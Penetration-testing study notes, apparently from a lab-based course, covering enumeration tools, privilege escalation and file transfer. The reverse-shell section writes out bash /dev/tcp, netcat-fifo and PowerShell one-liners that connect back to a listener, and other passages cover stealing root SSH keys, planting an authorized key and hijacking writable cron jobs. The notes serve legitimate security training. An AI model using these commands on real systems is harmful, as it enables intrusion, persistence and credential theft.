2. Getting Started
Risk Management
Identify, analyze, evaluate and deal with threats to the org's data, according to policy, without negatively affecting the org's operations
Identify: legal, environmental, market, regulatory and other sources of risk
Analyze: determine the impact and probability of each risk, and map it to policies, procedures and processes
Evaluate: the org decides whether to accept (unavoidable), avoid (change plans), control (mitigate) or transfer (insure) each risk
Deal: eliminate or reduce each risk as far as possible, interfacing with stakeholders
Monitor: watch for situational changes that could move a risk's impact between low, medium and high
Handy Cmds:
netstat -rn // routing table: which networks are reachable, and through which interface (the VPN is tun0)
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.1.2 0.0.0.0 UG 0 0 0 eth0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
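Added example (not part of the original notes): a small shell function that reads a `netstat -rn` style table and prints, as CIDR, every network reachable through a given interface, so you know what the VPN tunnel actually routes before you start scanning. The ROUTES table below is a constructed copy of the output above; in practice pass `"$(netstat -rn)"` as the second argument. It assumes awk and the Linux routing-table layout (Destination, Gateway, Genmask, ..., Iface columns).

```shell
#!/bin/sh
# Constructed copy of the `netstat -rn` output above; replace with "$(netstat -rn)".
ROUTES='Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.1.2     0.0.0.0         UG        0 0          0 eth0
10.10.14.0      0.0.0.0         255.255.254.0   U         0 0          0 tun0
10.129.0.0      10.10.14.1      255.255.0.0     UG        0 0          0 tun0
192.168.1.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0'

# mask2prefix 255.255.254.0 -> 23 : count the set bits of a dotted-quad netmask
mask2prefix() {
    echo "$1" | awk -F. '{
        bits = 0
        for (i = 1; i <= 4; i++) {
            o = $i
            while (o > 0) { bits += o % 2; o = int(o / 2) }
        }
        print bits
    }'
}

# vpn_networks <iface> [route-table-text]
# Prints "CIDR via GATEWAY" (or "directly connected" when the gateway is 0.0.0.0)
# for every route whose Iface column (the last field) matches <iface>.
vpn_networks() {
    iface=$1
    table=${2:-"$ROUTES"}
    printf '%s\n' "$table" |
    awk -v want="$iface" 'NR > 2 && $NF == want { print $1, $2, $3 }' |   # skip title + header
    while read -r dest gw mask; do
        prefix=$(mask2prefix "$mask")
        if [ "$gw" = "0.0.0.0" ]; then
            echo "$dest/$prefix (directly connected)"
        else
            echo "$dest/$prefix via $gw"
        fi
    done
}

vpn_networks tun0
# 10.10.14.0/23 (directly connected)
# 10.129.0.0/16 via 10.10.14.1
```

The two tun0 lines are what matters for the lab: 10.10.14.0/23 is the VPN segment itself (other players' attack boxes live there too) and 10.129.0.0/16 is the target range reached via the VPN gateway; eth0 routes are your local LAN and should stay out of scope.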
Services
Server Message Block (SMB):
SMB lets users and admins share folders and make them accessible over the network
smbclient is a tool that can enumerate and interact with SMB shares:
-L             retrieve the list of available shares on the remote host
-N             suppress the password prompt (null session)
get file.txt   download a file from the connected share
#smbclient
smbclient -N -L \\\\10.10.10.0 # list SMB shares without a password
smbclient \\\\10.10.10.0\\users # connect to the 'users' share
smbclient --no-pass -L //10.10.10.1 # same null session, forward-slash syntax
smbclient -U 'user[%passwd]' -L [--pw-nt-hash] //10.10.10.1 # authenticate with a password, or with an NT hash via --pw-nt-hash
smbclient -U '%' -N \\\\10.10.10.1\\<SHARE> # null session straight into a share
#snmpwalk
snmpwalk -v 2c -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # query the target with community string 'public', starting at sysName (omit the OID to walk the whole tree)
snmpget -V # which net-snmp version is installed locally
#handy OID's to know
1.3.6.1.2.1.1.1.0 # system description (sysDescr)
1.3.6.1.4.1.77.1.2.25 # Windows user accounts
1.3.6.1.2.1.25.4.2.1.2 # running processes (hrSWRunName)
1.3.6.1.2.1.2.2.1.2 # interface names (ifDescr)
1.3.6.1.2.1.6.13.1.3 # open/listening TCP local ports (tcpConnLocalPort)
1.3.6.1.2.1.25.6.3.1.2 # installed software (hrSWInstalledName)
1.3.6.1.2.1.25.2.3.1.4 # storage units (hrStorageAllocationUnits)
1.3.6.1.2.1.4.35 # IP-to-MAC neighbour/ARP table (ipNetToPhysicalTable), not a NAT table
1.3.6.1.2.1.4.21 # IP routing table (ipRouteTable)
1.3.6.1.2.1.31.1.1.1 # extended interface table (ifXTable: ifName, high-capacity counters), not wireless-specific
#other
onesixtyone -c brute.txt 10.10.10.1 # brute force the SNMP community string with the wordlist brute.txt
enum4linux -a 10.10.10.1 # enum4linux all-in-one scan (users, shares, groups, password policy) against a target
Tmux primer by ippsec
Vim Primer
Netcat: on Windows use netcat or, as an alternative, PowerCat. socat has features nc doesn't have (forwarding ports, connecting to serial devices)
It can also be used to upgrade a shell to a full TTY
A standalone socat binary can be transferred to a system after RCE to get a more stable reverse shell
#tmux
ctrl + b # default prefix
prefix c # new window
prefix 1 # switch to window 1
prefix % # split pane vertically
prefix " # split pane horizontally
prefix -> # move to the pane on the right (arrow keys move between panes)
#vim
i # insert mode
esc # back to normal mode
x # cut char
dw # cut word
dd # cut line
yw # copy word
yy # copy line
p # paste
:1 # go to line 1
:w # write file (save)
:q # quit
:wq # save and quit
:q! # quit without saving
nmap
#nmap
nmap -sV -sC -p- 10.10.10.0 # ver (V), script (sC), all ports (-p-)
locate scripts/citrix # find nmap scripts by name (here: citrix)
ls /usr/share/nmap/scripts | grep snmp # also lists nmap scripts, filtered to snmp
nmap --script smb-os-discovery.nse -p 445 10.10.10.0 # run an NSE script
nmap --script=banner -p 80 10.10.10.1 # banner grab
#example
nmap --script smb-os-discovery.nse -p445 10.10.10.40
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: CEO-PC
| NetBIOS computer name: CEO-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-27T00:59:46+00:00
#netcat
nc -nv 10.10.10.1 80 # banner grab (nc needs a port; -n no DNS, -v verbose)
sudo apt install seclists -y # install the SecLists wordlists (to /usr/share/seclists)
Web Enums
gobuster has additional functionality, such as enumerating public AWS S3 buckets
For DNS subdomain enumeration, add a DNS server such as 1.1.1.1 to /etc/resolv.conf
EyeWitness/Aquatone can be used to take screenshots of targets, fingerprint them and identify possible default credentials
Certificates: SSL/TLS certificates are another potentially valuable source of info if HTTPS is in use. Viewing the cert reveals details such as email addresses and the company name, which could be used to conduct a phishing attack if in scope. Programs like testssl.sh and sslscan are great for this
robots.txt: common for sites to contain one. It tells search engines/crawlers like Googlebot which resources can/can't be accessed for indexing, and can reveal the location of private files/admin pages
Source Code: worth checking the source code of any pages (leftover developer comments, hidden fields, paths)
#web enums
gobuster dir -u http://10.10.10.1 -w /usr/share/dirb/wordlists/common.txt # directory scan
gobuster dns -d site.com -w /usr/share/seclists/Discovery/DNS/namelist.txt # subdomain brute force
feroxbuster -x php -u http://10.10.10.1 # directory scan, also trying a .php extension on every word
dirsearch -u http://10.10.10.1 # another directory scanner
curl 10.10.10.1/robots.txt # check robots.txt
curl -IL https://www.website.com # headers only (-I), following redirects (-L): server banner
whatweb --no-errors 10.10.10.1 # web server / technology fingerprint
ctrl + U # view page source in the browser
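Added example (not from the original notes): robots.txt often lists exactly the admin and private paths a directory brute force would otherwise have to guess, so the disallowed entries make a good first wordlist. This function turns the Disallow/Allow lines into one path per line for gobuster/feroxbuster -w. The ROBOTS content is constructed; in practice pass `"$(curl -s http://10.10.10.1/robots.txt)"`. Assumes POSIX awk and sed.

```shell
#!/bin/sh
# Constructed robots.txt, standing in for `curl -s http://10.10.10.1/robots.txt`
ROBOTS='User-agent: *
Disallow: /admin/
Disallow: /backup/db.sql
Disallow: /private$
Allow: /public/
Disallow:
Sitemap: https://www.website.com/sitemap.xml
User-agent: Googlebot
Disallow: /admin/'

# robots_paths [robots.txt text]
# One path per line, de-duplicated, without leading/trailing slash and without
# robots wildcards ("/admin/*" -> "admin"), ready to be used as a -w wordlist.
robots_paths() {
    printf '%s\n' "${1:-$ROBOTS}" |
    tr -d '\r' |
    awk -F': *' 'tolower($1) == "disallow" || tolower($1) == "allow" { print $2 }' |
    sed 's/[*$].*$//; s#^/##; s#/$##' |
    grep -v '^$' |
    sort -u
}

robots_paths
# admin
# backup/db.sql
# private
# public

# Real use:
#   robots_paths "$(curl -s http://10.10.10.1/robots.txt)" > robots_words.txt
#   gobuster dir -u http://10.10.10.1 -w robots_words.txt
```

The `tr -d '\r'` matters on Windows-hosted sites, where a CRLF robots.txt would otherwise leave a carriage return on every word and make every request miss.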
Virtual Machines
Hypervisor: software that lets us create/run VMs by virtually sharing the host's memory/resources. VMs run isolated from the primary OS, which offers isolation/protection
Desktop hypervisors: Hyper-V on Windows; VirtualBox or VMware Workstation Player on Windows/Linux (free)
VMware Workstation requires a paid license but offers many more features
Bare-metal hypervisors such as Proxmox or VMware ESXi run VMs directly on the hardware
Folder Structure: keep a clear folder structure on the machine to save the data from each engagement
moo@htb[/htb]$ tree Projects/
Projects/
└── Acme Company
├── EPT (External Pentest)
│ ├── evidence
│ │ ├── credentials
│ │ ├── data
│ │ └── screenshots
│ ├── logs
│ ├── scans
│ ├── scope
│ └── tools
What's a shell?
A program that takes input from the user and passes commands to the OS to perform tasks
bash is the GNU replacement for the original Unix sh (Bourne shell); others like zsh, tcsh, ksh, etc. exist
Shell Types
Reverse shell: the target initiates a connection back to a listener on our attack box
Public Exploits
sudo apt install exploitdb -y # local copy of Exploit DB
searchsploit openssh 7.2 # search it for a service and version
Online exploit DBs to search for vulns: Exploit DB, Rapid7 DB, Vulnerability Lab
Metasploit Framework: contains built-in exploits for many public vulns, plus:
Recon scripts that enumerate hosts and compromised targets
Verification scripts that validate a vulnerability without exploiting it
Meterpreter: connects to shells and runs commands on compromised targets
Post-exploitation/pivoting tools
Reverse Shell Commands
The command we execute depends on the OS the compromised host runs and on which apps/commands we can access
PayloadsAllTheThings has a comprehensive list of reverse shells we can use
Certain commands are more reliable and can be attempted first to get a reverse connection:
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Once the shell loses its connection we have to rerun the exploit to regain access
Privilege Escalation
Checklists/tools: HackTricks, PayloadsAllTheThings, LinEnum, linuxprivchecker
dpkg -l # see what software is installed (Debian-based)
C:\Program Files # see what software is installed on Windows
find / -perm -u=s -type f 2>/dev/null # find all SUID binaries (setuid bit set)
sudo -l # check what sudo privileges we have
User Privileges
sudo allows a user to execute commands as a different user; it is often used to let lower-privileged users run specific commands as root without giving them root access
GTFOBins: list of commands and how they can be exploited through sudo (and SUID bits, capabilities)
LOLBAS: list of Windows built-in apps/binaries that can be leveraged, e.g. to download files or execute commands
Scheduled Tasks
Cron jobs: a form of scheduling tasks; jobs live in specific files/dirs, which we can use to add our own jobs if we have the right perms:
1. /etc/crontab
2. /etc/cron.d
3. /var/spool/cron/crontabs/root
If we can write to a script or directory called by a cron job, we can modify it to send us a shell when it executes
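Added example (not from the original notes) of the check described above: given a crontab-format file, pull out every absolute path a job runs and report whether we can write to that file, to its parent directory (so we could replace it), or whether it is missing from a directory we can write to (so we could create it). The demo builds a constructed crontab in a temp dir with a world-writable backup script; on a real box run `cron_writable_targets` over /etc/crontab and each file in /etc/cron.d. Note that `-w` answers for the current user, so as root everything looks writable; run it as the low-privileged user you actually have.

```shell
#!/bin/sh
# cron_writable_targets <crontab-file>
# Prints one line per distinct absolute path referenced by a job line.
cron_writable_targets() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' |
    # The first field that looks like an absolute path is the script/binary (or
    # the directory handed to run-parts). SHELL=/bin/sh style assignments, the
    # schedule fields and the user column never start with "/", so they are skipped.
    awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\/./) { print $i; break } }' |
    sort -u |
    while read -r target; do
        parent=$(dirname "$target")
        if [ -d "$target" ]; then
            if [ -w "$target" ]; then echo "$target: WRITABLE directory (drop a script in it)"
            else echo "$target: directory not writable"; fi
        elif [ -e "$target" ]; then
            if [ -w "$target" ]; then echo "$target: WRITABLE file (replace its contents)"
            elif [ -w "$parent" ]; then echo "$target: parent dir WRITABLE (move it aside and replace it)"
            else echo "$target: not writable"; fi
        else
            if [ -w "$parent" ]; then echo "$target: MISSING and parent dir WRITABLE (create it)"
            else echo "$target: missing"; fi
        fi
    done
}

# Constructed demo: a sloppy /etc/crontab in a temp dir (backup.sh is chmod 777).
demo_cron_check() {
    tmp=$(mktemp -d)
    mkdir "$tmp/cron.hourly"
    printf '#!/bin/sh\necho backup\n' > "$tmp/backup.sh"
    chmod 777 "$tmp/backup.sh"                   # the misconfiguration we want flagged
    cat > "$tmp/crontab" <<EOF
# /etc/crontab: system-wide crontab (constructed)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root $tmp/backup.sh > /dev/null 2>&1
17 * * * * root cd / && run-parts --report $tmp/cron.hourly
@reboot root $tmp/cleanup.sh
EOF
    cron_writable_targets "$tmp/crontab"
    rm -rf "$tmp"
}

demo_cron_check
```

A writable script that root runs every five minutes is the classic case: appending one of the reverse-shell one-liners to it is enough, but remember the job runs as the user in the sixth column, not necessarily root, and that a `run-parts` directory only executes files with valid names (no dots) and the execute bit set.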
Exposed Credentials: common config files, logs and user history (.bash_history on Linux, PSReadLine history on Windows)
SSH Keys: if we have read access to the .ssh dir of a specific user, we might be able to read private SSH keys in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa and use them to log in
If we can read the /root/.ssh/ dir, we can copy the key to our machine and use it with -i:
cat /home/user/.ssh/id_rsa or cat /root/.ssh/id_rsa
vim id_rsa # paste the key into a local file
chmod 600 id_rsa # make the perms more restrictive:
# lax perms on a private key make the ssh client refuse to use it
ssh user@10.10.10.10 -i id_rsa
If we have write access to a user's /.ssh/ dir, we can place our public key in it. sshd won't accept an authorized_keys file (or .ssh dir) that other users can write to, so this only works when we control that user's files
cat /home/user/.ssh/authorized_keys
ssh-keygen -f key # create a new key pair, -f output file
# 2 files created
1. key (the private key we use with ssh -i)
2. key.pub # the public key we copy to the remote machine
# copy key.pub onto the remote machine
# add it to /root/.ssh/authorized_keys
echo "ssh-rsa DSJDKLAAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
# echo typically achieves this; all we're doing is appending it to the file
ssh root@10.10.10.10 -i key
Transferring Files: a Python HTTP server on our machine and wget/cURL on the target to download files
cd /tmp # serve from the dir that holds the files
python3 -m http.server 8000 # start a simple HTTP server on port 8000
wget http://10.10.14.1:8000/linenum.sh # on the target: the file has to be in the dir the server was started from
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh # -o output file name
scp linenum.sh user@remotehost:/tmp/linenum.sh
# scp: specify the local file, then the remote destination path (needs SSH access to the target)
Base64: another option when a direct transfer isn't available is to base64 encode the file, paste the string on the remote server and decode it there
base64 -w 0 shell # transfer a binary 'shell': b64 encode it on a single line (-w 0 = no line wrapping)
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU
echo f0VMRgA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
# copy the b64 string, go to the remote host, decode it with base64 -d and pipe it to a file
file shell # validate the file format
md5sum shell # compare the md5sum on both sides to confirm the transfer is intact
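Added example (not the page's own code): the base64 transfer above as two shell functions, one that packs a local file into a single paste-able `echo ... | base64 -d > name` line together with its expected md5sum, and one for the remote side that verifies the recreated file, since a paste that got wrapped or truncated silently produces a broken binary. The sample file is constructed (a few bytes with NULs and high bytes standing in for a real ELF). Assumes GNU coreutils (`base64 -w 0`, `md5sum`).

```shell
#!/bin/sh
# make_sample <path> : constructed stand-in for a binary (NULs and non-ASCII bytes)
make_sample() {
    printf '\177ELF\002\001\001\000\000\000hello\n\377\376' > "$1"
}

file_md5() { md5sum "$1" | cut -d' ' -f1; }

# b64_pack <file> : the one line to paste into the remote shell, plus the expected md5
b64_pack() {
    printf 'echo %s | base64 -d > %s\n' "$(base64 -w 0 "$1")" "$(basename "$1")"
    printf '# expected md5: %s\n' "$(file_md5 "$1")"
}

# b64_check <file> <expected-md5> : run on the remote side after decoding
b64_check() {
    got=$(file_md5 "$1")
    if [ "$got" = "$2" ]; then
        echo "OK $1 $got"
    else
        echo "MISMATCH $1 expected=$2 got=$got (paste wrapped or truncated?)"
        return 1
    fi
}

# Round trip: pack locally, "paste" into a separate directory, verify there.
b64_roundtrip() {
    work=$(mktemp -d)
    make_sample "$work/shell"
    want=$(file_md5 "$work/shell")
    paste_line=$(b64_pack "$work/shell" | head -n 1)
    mkdir "$work/remote"
    ( cd "$work/remote" && eval "$paste_line" )     # what we would type on the target
    if b64_check "$work/remote/shell" "$want"; then status=0; else status=1; fi
    rm -rf "$work"
    return $status
}

b64_roundtrip
```

`-w 0` is the important flag: the default 76-column wrapping turns a binary into dozens of lines, and a terminal paste that loses one of them still decodes without complaint, which is exactly what the md5 comparison catches.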